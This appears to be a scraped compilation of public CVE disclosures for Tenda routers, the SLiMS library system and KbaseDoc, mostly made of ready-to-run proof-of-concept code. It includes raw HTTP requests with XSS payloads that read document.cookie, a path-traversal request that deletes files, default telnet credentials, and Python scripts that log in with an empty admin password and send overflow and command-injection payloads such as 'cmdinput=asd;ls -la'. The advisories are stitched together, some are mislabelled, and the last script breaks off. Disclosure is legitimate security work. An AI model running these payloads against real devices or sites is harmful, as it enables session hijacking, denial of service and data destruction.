Tenda W20E V16.01.0.6(3392) is vulnerable to Buffer Overflow.

**Tenda W20E Buffer overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/product/download/W20E.html

**Vulnerability information**

There is an buffer overflow vulnerability in tenda W20E V16.01.0.6(3392), which can cause httpd to crash and restart.

**Affected version**

Figure shows the latest firmware ：V16.01.0.6(3392)

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function formSetPortMirror, the corresponding function field is setPortMirror.

In function formSetPortMirror:

The program passes the contents obtained by the portMirrorMirroredPorts parameter to pMirroredPorts.  
Then, format the matching content of pMirroredPorts through the sprintf function into sMibValue.  
There is no size check, so there is a vulnerability that can cause buffer overflow through portMirrorMirroredPorts field.

The corresponding web page is as follws:

**Vulnerability exploitation condition**

Need to get cookie after logging in to execute the attack.

The functional data packets are as follows, and we will use this to construct poc.

POST /goform/module?1668753675738 HTTP/1.1
Host: 192.168.0.1
Content-Length: 95
Accept: text/plain, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Content-Type: application/json
Origin: http://192.168.0.1
Referer: http://192.168.0.1/index.html?v=3392
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: curShow=; bLanguage=cn; sessionid=W20Ev5:0.133.2:f012ed
Connection: close

{"setPortMirror":{"portMirrorEn":true,"portMirrorLanPort":4,"portMirrorMirroredPorts":"1,0,0a\*200"}}

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the POC

The poc and reproduction results are as follows:

And attack twice:

Figure shows POC attack effect, the binary httpd restarts, because the process id changed.

**CVE-ID**

unsigned

CVE-2022-45997: public_bug/tenda/w20e/1 at main · bugfinder0/public_bug

Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9Multiple XSS-Reflected vulnerabilities## Author: nu11secur1ty## Date: 12.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0## Description:The value of the keywords request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks.The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhcwas submitted in the keywords parameter.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhcHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhjuUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywnSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Fri, 09 Dec 2022 06:23:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 29492<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>        <meta name="description" content="Open Source LibraryManagement System | Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)## Proof and Exploit:[href](https://streamable.com/ac60v3)## Time spent`01:00:00`

Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Senayan Library Management System 9.4.0 Cross Site Scripting

Kbase Doc v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /web/IndexController.java.

****KbaseDoc V1.0 has an arbitrary file deletion vulnerability******Description:**

Kbase doc has an arbitrary file deletion vulnerability in src/main/java/com/eastrobot/doc/web/IndexController.java

Source code download address: https://github.com/ekoz/kbase-doc

Version: 1.0

**Vulnerability analysis:**

Locate the location where the vulnerability exists: src/main/java/com/eastrobot/doc/web/IndexController.java 

The POST request gets the name parameter,Since there is no filtering,As a result, parameters such as ../ can be spliced,Causes directory traversal,Because deletion is involved,Resulting in arbitrary file deletion vulnerability.

**Recurrence of vulnerability**

**Download the source code and build the local environment**

Create a poc.txt file in the kbase-doc-master\target\classes directory .

Use burpsuite to construct the following request.

\[+\] POC:

    POST /index/delete HTTP/1.1
    Host: test:8081
    Content-Length: 22
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Origin: chrome-extension://coohjcphdfgbiolnekdpbcijmhambjff
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie:__utma=71411734.247469081.1654064241.1654064241.1654064241.1; __utmz=71411734.1654064241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
    Connection: close
    
    name=..%2F..%2Fpoc.txt
    
    

It is found that poc.txt is deleted.

**Proof and Exploit:**

href

CVE-2022-45290: KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability/README.md at main · HH1F/KbaseDoc-v1.0-Arbitrary-file-deletion-vulnerability

An issue in the component tpi_systool_handle(0) (/goform/SysToolReboot) of Tenda W6-S v1.0.0.4(510) allows unauthenticated attackers to arbitrarily reboot the device.

Permalink

**Tenda W6-S V1.0.0.4(510) Reboot router without authentication****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/SysToolReboot, tpi\_systool\_handle(0) will cause the entire router to reboot without authorization

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/SysToolReboot'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=asd;ls -la . > ./tmp/test;aa'

requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router restarts

CVE-2022-45498: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue in the component tpi_systool_handle(0) (/goform/SysToolRestoreSet) of Tenda W6-S v1.0.0.4(510) allows unauthenticated attackers to arbitrarily reboot the device.

Permalink

**Tenda W6-S V1.0.0.4(510) Reboot router without authentication****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/SysToolRestoreSet, tpi\_systool\_handle(0) will cause the entire router to reboot without authorization

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/SysToolRestoreSet'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'linkEn=1&ping1=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router restarts

CVE-2022-45504: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/wifiSSIDset.

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/wifiSSIDset, when wl\_radio is 0, the index will be spliced into v24 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/wifiSSIDset'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'wl\_radio=0&index=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45501: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the cmdinput parameter at /goform/exeCommand.

Permalink

Cannot retrieve contributors at this time

**Tenda W30E V1.0.1.25(633) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2218.html
    

**Affected version**

**Vulnerability details**

In /goform/exeCommand, cmdinput will be copied to s by strcpy. It is worth noting that there is no size check, resulting in a stack overflow vulnerability

**Poc**

import requests

target\_url \= 'http://192.168.10.103/login/Auth'

target\_headers \= {'Host' : '192.168.10.103',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.103',
'Referer' : 'http://192.168.10.103/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.103/goform/exeCommand'

target\_headers \= {'Host' : '192.168.10.103',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.103',
'Referer' : 'http://192.168.10.103/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=' + 'a' \* 0x3000
